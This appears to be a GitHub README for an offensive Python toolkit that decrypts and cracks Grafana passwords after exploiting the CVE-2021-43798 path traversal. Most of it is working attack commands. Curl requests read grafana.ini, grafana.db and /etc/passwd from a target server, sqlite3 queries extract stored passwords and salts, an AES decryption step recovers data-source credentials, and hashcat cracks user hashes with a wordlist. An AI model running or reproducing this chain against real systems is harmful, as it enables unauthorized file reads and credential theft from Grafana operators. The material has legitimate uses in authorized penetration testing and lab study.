Python toolkit for decrypting and cracking Grafana passwords from multiple formats.
Coded by: strikoder
Handles two types of Grafana password storage:
- 🔐 AES-256 Base64 (data_source table) → Decrypt directly with AESDecrypt.py
- 🔨 PBKDF2_HMAC_SHA256 (user table) → Convert for Hashcat with grafana2hashcat.py
Perfect for post-exploitation after CVE-2021-43798 path traversal.
A path traversal vulnerability in Grafana versions 8.0.0-beta1 through 8.3.0 that allows unauthenticated attackers to read arbitrary files from the server, including:
- Configuration files (
/etc/grafana/grafana.ini) - Database files (
/var/lib/grafana/grafana.db) - System files (
/etc/passwd)
Example exploit:
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
--path-as-is --output grafana.dbThis toolkit completes the attack chain by decrypting/cracking the passwords you extract from the database.
Decrypts AES-256 encrypted passwords from the data_source table.
Based on: jas502n/Grafana-CVE-2021-43798 with key improvements:
- ✅ Flexible Secret Key: Extract key manually (no hardcoded paths)
- ✅ Batch Processing: Decrypt multiple hashes from a file
- ✅ Fully Configurable: All parameters via CLI flags
Converts Grafana PBKDF2_HMAC_SHA256 hashes from the user table to Hashcat-compatible format for password cracking.
Credit: iamaldi/grafana2hashcat
git clone https://github.com/strikoder/Grafana-Password-Decryptor.git
cd Grafana-Password-Decryptor
pip install cryptography #for Decyrption
chmod +x AESDecrypt.py grafana2hashcat.pypython3 AESDecrypt.py -hash R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==python3 AESDecrypt.py -f hashes.txtExtract the secret key from Grafana config:
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' --path-as-is | grep secret_key
python3 AESDecrypt.py -hash [HASH] -k YOUR_SECRET_KEYpython3 grafana2hashcat.py grafana_hashes.txtInput format (grafana_hashes.txt):
hash1,salt1
hash2,salt2
hash3,salt3
Output (ready for Hashcat):
sha256:10000:base64_salt:base64_hash
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txthashcat -m 10900 hashcat_hashes.txt wordlist.txt# 1. Extract secret key from grafana.ini (might be empty in some cases, use default key in python program in that case)
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../etc/grafana/grafana.ini' \
--path-as-is | grep secret_key
# 2. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
--path-as-is -o grafana.db
# 3. Extract AES-encrypted passwords from data_source table
sqlite3 grafana.db "SELECT name, password FROM data_source;"
# 4. Save passwords to file (one per line)
# Example: R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
# 5. Decrypt with extracted secret key
python3 AESDecrypt.py -f passwords.txt -k [SECRET_KEY]# 0. Download the database
curl 'http://target:3000/public/plugins/zipkin/../../../../../../../../var/lib/grafana/grafana.db' \
--path-as-is -o grafana.db
# 1. Extract PBKDF2 password hashes from user table
sqlite3 grafana.db "SELECT login, password, salt FROM user;"
# 2. Format hashes for grafana2hashcat (hash,salt format)
# Example format in grafana_hashes.txt:
# 3ad31dc57a7452c442f259cfff7aa61f2a6cea88ee634724ae146e221ae4e01c56c8bcbb3552310acd2fd746a396d2f99bf8,pepper
# 3. Convert to Hashcat format
python3 grafana2hashcat.py grafana_hashes.txt -o hashcat_hashes.txt
# 4. Crack with Hashcat (mode 10900 = PBKDF2-HMAC-SHA256)
hashcat -m 10900 hashcat_hashes.txt rockyou.txt| Password Type | Database Table | Format | Tool | Hashcat Mode |
|---|---|---|---|---|
| AES-256 Encrypted | data_source |
Base64 string | AESDecrypt.py |
N/A (direct decrypt) |
| PBKDF2_HMAC_SHA256 | user |
Hex hash + salt | grafana2hashcat.py |
-m 10900 |
- AESDecrypt.py: Coded by strikoder, based on jas502n's Go implementation
- grafana2hashcat.py: Created by iamaldi
⭐ Found this useful? Give it a star!
Coded by strikoder